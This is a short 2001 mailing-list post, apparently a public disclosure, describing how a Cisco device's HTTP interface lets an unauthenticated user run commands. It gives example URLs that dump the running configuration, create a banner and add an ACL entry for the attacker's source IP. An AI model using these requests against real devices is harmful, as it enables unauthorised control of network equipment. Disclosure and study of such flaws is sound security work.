Date: Mon, 2 Jul 2001 13:56:37 -0700 (MST)
From: Half Adder <dps@Lib-Vai.lib.asu.edu.>
To: [email protected]Subject: Cisco device HTTP exploit...
You can also run configuration commands. :)
http://169.254.0.15/level/42/configure/-/banner/motd/LINE, etc.
Start with http://169.254.0.16/level/xx/configure and go from there.
A malicious user could use:
http://169.254.0.15/level/42/exec/show%20conf
to get, for instance, vty 0 4 acl information and then add an ACL for
his/her source ip.
I tested creating a banner. I assume other configure commands will work
as well. This was tested on a Cisco switch. Anyone?